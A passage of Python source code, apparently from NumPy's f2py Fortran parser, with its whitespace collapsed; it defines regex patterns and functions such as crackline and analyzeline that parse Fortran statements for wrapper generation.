dowithline=dowithline, istop=0) else: include_dirs = [ os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir, fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1, dowithline=dowithline, istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % ( repr(fn), os.pathsep.join(include_dirs))) else: dowithline(finalline) l1 = ll if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll filepositiontext = 'Line #%d in %s:"%s"\n\t' % ( fin.filelineno() - 1, currentfilename, l1) m = includeline.match(origfinalline) if m: fn = m.group('name') if os.path.isfile(fn): readfortrancode(fn, dowithline=dowithline, istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir, fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1, dowithline=dowithline, istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. 
Ignoring.\n' % ( repr(fn), os.pathsep.join(include_dirs))) else: dowithline(finalline) filepositiontext = '' fin.close() if istop: dowithline('', 1) else: gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\ beginpattern, quiet, verbose, dolowercase = saveglobals # Crack line beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \ r'\s*(?P<this>(\b(%s)\b))' + \ r'\s*(?P<after>%s)\s*\Z' ## fortrantypes = r'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte' typespattern = re.compile( beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type' typespattern4implicit = re.compile(beforethisafter % ( '', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I) # functionpattern = re.compile(beforethisafter % ( r'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin' subroutinepattern = re.compile(beforethisafter % ( r'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin' # modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin' # groupbegins77 = r'program|block\s*data' beginpattern77 = re.compile( beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin' groupbegins90 = groupbegins77 + \ r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()' beginpattern90 = re.compile( beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin' groupends = (r'end|endprogram|endblockdata|endmodule|endpythonmodule|' r'endinterface|endsubroutine|endfunction') endpattern = re.compile( beforethisafter % ('', groupends, groupends, r'[\w\s]*'), re.I), 'end' # endifs='end\s*(if|do|where|select|while|forall)' endifs = r'(end\s*(if|do|where|select|while|forall))|(module\s*procedure)' endifpattern = re.compile( beforethisafter % (r'[\w]*?', endifs, endifs, r'[\w\s]*'), re.I), 'endif' # implicitpattern = re.compile( beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit' dimensionpattern = re.compile(beforethisafter % ( '', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension' externalpattern = re.compile( beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external' optionalpattern = re.compile( beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional' requiredpattern = re.compile( beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required' publicpattern = re.compile( beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public' privatepattern = re.compile( beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private' intrinsicpattern = re.compile( beforethisafter % ('', 'intrinsic', 'intrinsic', '.*'), re.I), 'intrinsic' intentpattern = re.compile(beforethisafter % ( '', 'intent|depend|note|check', 'intent|depend|note|check', r'\s*\(.*?\).*'), re.I), 'intent' parameterpattern = re.compile( beforethisafter % ('', 'parameter', 'parameter', r'\s*\(.*'), re.I), 'parameter' datapattern = re.compile( beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data' callpattern = re.compile( beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call' entrypattern = re.compile( beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry' callfunpattern = re.compile( beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun' commonpattern = re.compile( beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common' usepattern = re.compile( beforethisafter % ('', 'use', 'use', '.*'), re.I), 
'use' containspattern = re.compile( beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains' formatpattern = re.compile( beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format' # Non-fortran and f2py-specific statements f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements' multilinepattern = re.compile( r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline' ## def split_by_unquoted(line, characters): """ Splits the line into (line[:i], line[i:]), where i is the index of first occurrence of one of the characters not within quotes, or len(line) if no such index exists """ assert not (set('"\'') & set(characters)), "cannot split by unquoted quotes" r = re.compile( r"\A(?P<before>({single_quoted}|{double_quoted}|{not_quoted})*)" r"(?P<after>{char}.*)\Z".format( not_quoted="[^\"'{}]".format(re.escape(characters)), char="[{}]".format(re.escape(characters)), single_quoted=r"('([^'\\]|(\\.))*')", double_quoted=r'("([^"\\]|(\\.))*")')) m = r.match(line) if m: d = m.groupdict() return (d["before"], d["after"]) return (line, "") def _simplifyargs(argsline): a = [] for n in markoutercomma(argsline).split('@,@'): for r in '(),': n = n.replace(r, '_') a.append(n) return ','.join(a) crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I) def crackline(line, reset=0): """ reset=-1 --- initialize reset=0 --- crack the line reset=1 --- final check if mismatch of blocks occurred Cracked data is saved in grouplist[0]. """ global beginpattern, groupcounter, groupname, groupcache, grouplist global filepositiontext, currentfilename, neededmodule, expectbegin global skipblocksuntil, skipemptyends, previous_context, gotnextfile _, has_semicolon = split_by_unquoted(line, ";") if has_semicolon and not (f2pyenhancementspattern[0].match(line) or multilinepattern[0].match(line)): # XXX: non-zero reset values need testing assert reset == 0, repr(reset) # split line on unquoted semicolons line, semicolon_line = split_by_unquoted(line, ";") while semicolon_line: crackline(line, reset) line, semicolon_line = split_by_unquoted(semicolon_line[1:], ";") crackline(line, reset) return if reset < 0: groupcounter = 0 groupname = {groupcounter: ''} groupcache = {groupcounter: {}} grouplist = {groupcounter: []} groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['block'] = '' groupcache[groupcounter]['name'] = '' neededmodule = -1 skipblocksuntil = -1 return if reset > 0: fl = 0 if f77modulename and neededmodule == groupcounter: fl = 2 while groupcounter > fl: outmess('crackline: groupcounter=%s groupname=%s\n' % (repr(groupcounter), repr(groupname))) outmess( 'crackline: Mismatch of blocks encountered. 
Trying to fix it by assuming "end" statement.\n') grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 if f77modulename and neededmodule == groupcounter: grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end interface grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end module neededmodule = -1 return if line == '': return flag = 0 for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern, requiredpattern, parameterpattern, datapattern, publicpattern, privatepattern, intrinsicpattern, endifpattern, endpattern, formatpattern, beginpattern, functionpattern, subroutinepattern, implicitpattern, typespattern, commonpattern, callpattern, usepattern, containspattern, entrypattern, f2pyenhancementspattern, multilinepattern ]: m = pat[0].match(line) if m: break flag = flag + 1 if not m: re_1 = crackline_re_1 if 0 <= skipblocksuntil <= groupcounter: return if 'externals' in groupcache[groupcounter]: for name in groupcache[groupcounter]['externals']: if name in invbadnames: name = invbadnames[name] if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']: continue m1 = re.match( r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I) if m1: m2 = re_1.match(m1.group('before')) a = _simplifyargs(m1.group('args')) if m2: line = 'callfun %s(%s) result (%s)' % ( name, a, m2.group('result')) else: line = 'callfun %s(%s)' % (name, a) m = callfunpattern[0].match(line) if not m: outmess( 'crackline: could not resolve function call for line=%s.\n' % repr(line)) return analyzeline(m, 'callfun', line) return if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')): previous_context = None outmess('crackline:%d: No pattern for line\n' % (groupcounter)) return elif pat[1] == 'end': if 0 <= skipblocksuntil < groupcounter: groupcounter = groupcounter - 1 if skipblocksuntil <= groupcounter: return if groupcounter <= 0: raise Exception('crackline: groupcounter(=%s) is nonpositive. ' 'Check the blocks.' 
% (groupcounter)) m1 = beginpattern[0].match((line)) if (m1) and (not m1.group('this') == groupname[groupcounter]): raise Exception('crackline: End group %s does not match with ' 'previous Begin group %s\n\t%s' % (repr(m1.group('this')), repr(groupname[groupcounter]), filepositiontext) ) if skipblocksuntil == groupcounter: skipblocksuntil = -1 grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 if not skipemptyends: expectbegin = 1 elif pat[1] == 'begin': if 0 <= skipblocksuntil <= groupcounter: groupcounter = groupcounter + 1 return gotnextfile = 0 analyzeline(m, pat[1], line) expectbegin = 0 elif pat[1] == 'endif': pass elif pat[1] == 'contains': if ignorecontains: return if 0 <= skipblocksuntil <= groupcounter: return skipblocksuntil = groupcounter else: if 0 <= skipblocksuntil <= groupcounter: return analyzeline(m, pat[1], line) def markouterparen(line): l = '' f = 0 for c in line: if c == '(': f = f + 1 if f == 1: l = l + '@(@' continue elif c == ')': f = f - 1 if f == 0: l = l + '@)@' continue l = l + c return l def markoutercomma(line, comma=','): l = '' f = 0 before, after = split_by_unquoted(line, comma + '()') l += before while after: if (after[0] == comma) and (f == 0): l += '@' + comma + '@' else: l += after[0] if after[0] == '(': f += 1 elif after[0] == ')': f -= 1 before, after = split_by_unquoted(after[1:], comma + '()') l += before assert not f, repr((f, line, l)) return l def unmarkouterparen(line): r = line.replace('@(@', '(').replace('@)@', ')') return r def appenddecl(decl, decl2, force=1): if not decl: decl = {} if not decl2: return decl if decl is decl2: return decl for k in list(decl2.keys()): if k == 'typespec': if force or k not in decl: decl[k] = decl2[k] elif k == 'attrspec': for l in decl2[k]: decl = setattrspec(decl, l, force) elif k == 'kindselector': decl = setkindselector(decl, decl2[k], force) elif k == 'charselector': decl = setcharselector(decl, decl2[k], force) elif k in ['=', 'typename']: if force or k not in decl: decl[k] = decl2[k] elif k == 'note': pass elif k in ['intent', 'check', 'dimension', 'optional', 'required']: errmess('appenddecl: "%s" not implemented.\n' % k) else: raise Exception('appenddecl: Unknown variable definition key:' + str(k)) return decl selectpattern = re.compile( r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I) nameargspattern = re.compile( r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I) callnameargspattern = re.compile( r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I) real16pattern = re.compile( r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)') real8pattern = re.compile( r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))') _intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I) def _is_intent_callback(vdecl): for a in vdecl.get('attrspec', []): if _intentcallbackpattern.match(a): return 1 return 0 def _resolvenameargspattern(line): line = markouterparen(line) m1 = nameargspattern.match(line) if m1: return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind') m1 = callnameargspattern.match(line) if m1: return m1.group('name'), m1.group('args'), None, None return None, [], None, None def analyzeline(m, case, line): global groupcounter, groupname, groupcache, 
grouplist, filepositiontext global currentfilename, f77modulename, neededinterface, neededmodule global expectbegin, gotnextfile, previous_context block = m.group('this') if case != 'multiline': previous_context = None if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \ and not skipemptyends and groupcounter < 1: newname = os.path.basename(currentfilename).split('.')[0] outmess( 'analyzeline: no group yet. Creating program group with name "%s".\n' % newname) gotnextfile = 0 groupcounter = groupcounter + 1 groupname[groupcounter] = 'program' groupcache[groupcounter] = {} grouplist[groupcounter] = [] groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['block'] = 'program' groupcache[groupcounter]['name'] = newname groupcache[groupcounter]['from'] = 'fromsky' expectbegin = 0 if case in ['begin', 'call', 'callfun']: # Crack line => block,name,args,result block = block.lower() if re.match(r'block\s*data', block, re.I): block = 'block data' if re.match(r'python\s*module', block, re.I): block = 'python module' name, args, result, bind = _resolvenameargspattern(m.group('after')) if name is None: if block == 'block data': name = '_BLOCK_DATA_' else: name = '' if block not in ['interface', 'block data']: outmess('analyzeline: No name/args pattern found for line.\n') previous_context = (block, name, groupcounter) if args: args = rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args = [] if '' in args: while '' in args: args.remove('') outmess( 'analyzeline: argument list is malformed (missing argument).\n') # end of crack line => block,name,args,result needmodule = 0 needinterface = 0 if case in ['call', 'callfun']: needinterface = 1 if 'args' not in groupcache[groupcounter]: return if name not in groupcache[groupcounter]['args']: return for it in grouplist[groupcounter]: if it['name'] == name: return if name in groupcache[groupcounter]['interfaced']: return block = {'call': 'subroutine', 'callfun': 'function'}[case] if f77modulename and neededmodule == -1 and groupcounter <= 1: neededmodule = groupcounter + 2 needmodule = 1 if block != 'interface': needinterface = 1 # Create new block(s) groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] if needmodule: if verbose > 1: outmess('analyzeline: Creating module block %s\n' % repr(f77modulename), 0) groupname[groupcounter] = 'module' groupcache[groupcounter]['block'] = 'python module' groupcache[groupcounter]['name'] = f77modulename groupcache[groupcounter]['from'] = '' groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] if needinterface: if verbose > 1: outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % ( groupcounter), 0) groupname[groupcounter] = 'interface' groupcache[groupcounter]['block'] = 'interface' groupcache[groupcounter]['name'] = 'unknown_interface' groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name']) groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] groupname[groupcounter] = block groupcache[groupcounter]['block'] = 
block if not name: name = 'unknown_' + block groupcache[groupcounter]['prefix'] = m.group('before') groupcache[groupcounter]['name'] = rmbadname1(name) groupcache[groupcounter]['result'] = result if groupcounter == 1: groupcache[groupcounter]['from'] = currentfilename else: if f77modulename and groupcounter == 3: groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], currentfilename) else: groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name']) for k in list(groupcache[groupcounter].keys()): if not groupcache[groupcounter][k]: del groupcache[groupcounter][k] groupcache[groupcounter]['args'] = args groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['entry'] = {} # end of creation if block == 'type': groupcache[groupcounter]['varnames'] = [] if case in ['call', 'callfun']: # set parents variables if name not in groupcache[groupcounter - 2]['externals']: groupcache[groupcounter - 2]['externals'].append(name) groupcache[groupcounter]['vars'] = copy.deepcopy( groupcache[groupcounter - 2]['vars']) try: del groupcache[groupcounter]['vars'][name][ groupcache[groupcounter]['vars'][name]['attrspec'].index('external')] except Exception: pass if block in ['function', 'subroutine']: # set global attributes try: groupcache[groupcounter]['vars'][name] = appenddecl( groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars']['']) except Exception: pass if case == 'callfun': # return type if result and result in groupcache[groupcounter]['vars']: if not name == result: groupcache[groupcounter]['vars'][name] = appenddecl( groupcache[groupcounter]['vars'][name], groupcache[groupcounter]['vars'][result]) # if groupcounter>1: # name is interfaced try: groupcache[groupcounter - 2]['interfaced'].append(name) except Exception: pass if block == 'function': t = typespattern[0].match(m.group('before') + ' ' + name) if t: typespec, selector, attr, edecl = cracktypespec0( t.group('this'), t.group('after')) updatevars(typespec, selector, attr, edecl) if case in ['call', 'callfun']: grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end routine grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end interface elif case == 'entry': name, args, result, bind = _resolvenameargspattern(m.group('after')) if name is not None: if args: args = rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args = [] assert result is None, repr(result) groupcache[groupcounter]['entry'][name] = args previous_context = ('entry', name, groupcounter) elif case == 'type': typespec, selector, attr, edecl = cracktypespec0( block, m.group('after')) last_name = updatevars(typespec, selector, attr, edecl) if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrinsic']: edecl = groupcache[groupcounter]['vars'] ll = m.group('after').strip() i = ll.find('::') if i < 0 and case == 'intent': i = markouterparen(ll).find('@)@') - 2 ll = ll[:i + 1] + '::' + ll[i + 1:] i = ll.find('::') if ll[i:] == 
'::' and 'args' in groupcache[groupcounter]: outmess('All arguments will have attribute %s%s\n' % (m.group('this'), ll[:i])) ll = ll + ','.join(groupcache[groupcounter]['args']) if i < 0: i = 0 pl = '' else: pl = ll[:i].strip() ll = ll[i + 2:] ch = markoutercomma(pl).split('@,@') if len(ch) > 1: pl = ch[0] outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % ( ','.join(ch[1:]))) last_name = None for e in [x.strip() for x in markoutercomma(ll).split('@,@')]: m1 = namepattern.match(e) if not m1: if case in ['public', 'private']: k = '' else: print(m.groupdict()) outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % ( case, repr(e))) continue else: k = rmbadname1(m1.group('name')) if k not in edecl: edecl[k] = {} if case == 'dimension': ap = case + m1.group('after') if case == 'intent': ap = m.group('this') + pl if _intentcallbackpattern.match(ap): if k not in groupcache[groupcounter]['args']: if groupcounter > 1: if '__user__' not in groupcache[groupcounter - 2]['name']: outmess( 'analyzeline: missing __user__ module (could be nothing)\n') # fixes ticket 1693 if k != groupcache[groupcounter]['name']: outmess('analyzeline: appending intent(callback) %s' ' to %s arguments\n' % (k, groupcache[groupcounter]['name'])) groupcache[groupcounter]['args'].append(k) else: errmess( 'analyzeline: intent(callback) %s is ignored' % (k)) else: errmess('analyzeline: intent(callback) %s is already' ' in argument list' % (k)) if case in ['optional', 'required', 'public', 'external', 'private', 'intrinsic']: ap = case if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append(ap) else: edecl[k]['attrspec'] = [ap] if case == 'external': if groupcache[groupcounter]['block'] == 'program': outmess('analyzeline: ignoring program arguments\n') continue if k not in groupcache[groupcounter]['args']: continue if 'externals' not in groupcache[groupcounter]: groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['externals'].append(k) last_name = k groupcache[groupcounter]['vars'] = edecl if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'parameter': edecl = groupcache[groupcounter]['vars'] ll = m.group('after').strip()[1:-1] last_name = None for e in markoutercomma(ll).split('@,@'): try: k, initexpr = [x.strip() for x in e.split('=')] except Exception: outmess( 'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll)) continue params = get_parameters(edecl) k = rmbadname1(k) if k not in edecl: edecl[k] = {} if '=' in edecl[k] and (not edecl[k]['='] == initexpr): outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % ( k, edecl[k]['='], initexpr)) t = determineexprtype(initexpr, params) if t: if t.get('typespec') == 'real': tt = list(initexpr) for m in real16pattern.finditer(initexpr): tt[m.start():m.end()] = list( initexpr[m.start():m.end()].lower().replace('d', 'e')) initexpr = ''.join(tt) elif t.get('typespec') == 'complex': initexpr = initexpr[1:].lower().replace('d', 'e').\ replace(',', '+1j*(') try: v = eval(initexpr, {}, params) except (SyntaxError, NameError, TypeError) as msg: errmess('analyzeline: Failed to evaluate %r. 
Ignoring: %s\n' % (initexpr, msg)) continue edecl[k]['='] = repr(v) if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append('parameter') else: edecl[k]['attrspec'] = ['parameter'] last_name = k groupcache[groupcounter]['vars'] = edecl if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'implicit': if m.group('after').strip().lower() == 'none': groupcache[groupcounter]['implicit'] = None elif m.group('after'): if 'implicit' in groupcache[groupcounter]: impl = groupcache[groupcounter]['implicit'] else: impl = {} if impl is None: outmess( 'analyzeline: Overwriting earlier "implicit none" statement.\n') impl = {} for e in markoutercomma(m.group('after')).split('@,@'): decl = {} m1 = re.match( r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I) if not m1: outmess( 'analyzeline: could not extract info of implicit statement part "%s"\n' % (e)) continue m2 = typespattern4implicit.match(m1.group('this')) if not m2: outmess( 'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e)) continue typespec, selector, attr, edecl = cracktypespec0( m2.group('this'), m2.group('after')) kindselect, charselect, typename = cracktypespec( typespec, selector) decl['typespec'] = typespec decl['kindselector'] = kindselect decl['charselector'] = charselect decl['typename'] = typename for k in list(decl.keys()): if not decl[k]: del decl[k] for r in markoutercomma(m1.group('after')).split('@,@'): if '-' in r: try: begc, endc = [x.strip() for x in r.split('-')] except Exception: outmess( 'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r) continue else: begc = endc = r.strip() if not len(begc) == len(endc) == 1: outmess( 'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r) continue for o in range(ord(begc), ord(endc) + 1): impl[chr(o)] = decl groupcache[groupcounter]['implicit'] = impl elif case == 'data': ll = [] dl = '' il = '' f = 0 fc = 1 inp = 0 for c in m.group('after'): if not inp: if c == "'": fc = not fc if c == '/' and fc: f = f + 1 continue if c == '(': inp = inp + 1 elif c == ')': inp = inp - 1 if f == 0: dl = dl + c elif f == 1: il = il + c elif f == 2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl, il]) dl = c il = '' f = 0 if f == 2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl, il]) vars = {} if 'vars' in groupcache[groupcounter]: vars = groupcache[groupcounter]['vars'] last_name = None for l in ll: l = [x.strip() for x in l] if l[0][0] == ',': l[0] = l[0][1:] if l[0][0] == '(': outmess( 'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0]) continue i = 0 j = 0 llen = len(l[1]) for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]): if v[0] == '(': outmess( 'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v) # XXX: subsequent init expressions may get wrong values. # Ignoring since data statements are irrelevant for # wrapping. 
continue fc = 0 while (i < llen) and (fc or not l[1][i] == ','): if l[1][i] == "'": fc = not fc i = i + 1 i = i + 1 if v not in vars: vars[v] = {} if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]: outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % ( v, vars[v]['='], l[1][j:i - 1])) vars[v]['='] = l[1][j:i - 1] j = i last_name = v groupcache[groupcounter]['vars'] = vars if last_name is not None: previous_context = ('variable', last_name, groupcounter) elif case == 'common': line = m.group('after').strip() if not line[0] == '/': line = '//' + line cl = [] f = 0 bn = '' ol = '' for c in line: if c == '/': f = f + 1 continue if f >= 3: bn = bn.strip() if not bn: bn = '_BLNK_' cl.append([bn, ol]) f = f - 2 bn = '' ol = '' if f % 2: bn = bn + c else: ol = ol + c bn = bn.strip() if not bn: bn = '_BLNK_' cl.append([bn, ol]) commonkey = {} if 'common' in groupcache[groupcounter]: commonkey = groupcache[groupcounter]['common'] for c in cl: if c[0] not in commonkey: commonkey[c[0]] = [] for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]: if i: commonkey[c[0]].append(i) groupcache[groupcounter]['common'] = commonkey previous_context = ('common', bn, groupcounter) elif case == 'use': m1 = re.match( r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I) if m1: mm = m1.groupdict() if 'use' not in groupcache[groupcounter]: groupcache[groupcounter]['use'] = {} name = m1.group('name') groupcache[groupcounter]['use'][name] = {} isonly = 0 if 'list' in mm and mm['list'] is not None: if 'notonly' in mm and mm['notonly'] is None: isonly = 1 groupcache[groupcounter]['use'][name]['only'] = isonly ll = [x.strip() for x in mm['list'].split(',')] rl = {} for l in ll: if '=' in l: m2 = re.match( r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I) if m2: rl[m2.group('local').strip()] = m2.group( 'use').strip() else: outmess( 'analyzeline: Not local=>use pattern found in %s\n' % repr(l)) else: rl[l] = l groupcache[groupcounter]['use'][name]['map'] = rl else: pass else: print(m.groupdict()) outmess('analyzeline: Could not crack the use statement.\n') elif case in ['f2pyenhancements']: if 'f2pyenhancements' not in groupcache[groupcounter]: groupcache[groupcounter]['f2pyenhancements'] = {} d = groupcache[groupcounter]['f2pyenhancements'] if m.group('this') == 'usercode' and 'usercode' in d: if isinstance(d['usercode'], str): d['usercode'] = [d['usercode']] d['usercode'].append(m.group('after')) else: d[m.group('this')] = m.group('after') elif case == 'multiline': if previous_context is None: if verbose: outmess('analyzeline: No context for multiline block.\n') return gc = groupcounter appendmultiline(groupcache[gc], previous_context[:2], m.group('this')) else: if verbose > 1: print(m.groupdict()) outmess('analyzeline: No code implemented for line.\n') def appendmultiline(group, context_name, ml): if 'f2pymultilines' not in group: group['f2pymultilines'] = {} d = group['f2pymultilines'] if context_name not in d: d[context_name] = [] d[context_name].append(ml) return def cracktypespec0(typespec, ll): selector = None attr = None if re.match(r'double\s*complex', typespec, re.I): typespec = 'double complex' elif re.match(r'double\s*precision', typespec, re.I): typespec = 'double precision' else: typespec = typespec.strip().lower() m1 = selectpattern.match(markouterparen(ll)) if not m1: outmess( 'cracktypespec0: no kind/char_selector pattern found for line.\n') return d = m1.groupdict() for k in 
list(d.keys()): d[k] = unmarkouterparen(d[k]) if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']: selector = d['this'] ll = d['after'] i = ll.find('::') if i >= 0: attr = ll[:i].strip() ll = ll[i + 2:] return typespec, selector, attr, ll ##### namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I) kindselector = re.compile( r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I) charselector = re.compile( r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I) lenkindpattern = re.compile( r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I) lenarraypattern = re.compile( r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I) def removespaces(expr): expr = expr.strip() if len(expr) <= 1: return expr expr2 = expr[0] for i in range(1, len(expr) - 1): if (expr[i] == ' ' and ((expr[i + 1] in "()[]{}=+-/* ") or (expr[i - 1] in "()[]{}=+-/* "))): continue expr2 = expr2 + expr[i] expr2 = expr2 + expr[-1] return expr2 def markinnerspaces(line): l = '' f = 0 cc = '\'' cb = '' for c in line: if cb == '\\' and c in ['\\', '\'', '"']: l = l + c cb = c continue if f == 0 and c in ['\'', '"']: cc = c if c == cc: f = f + 1 elif c == 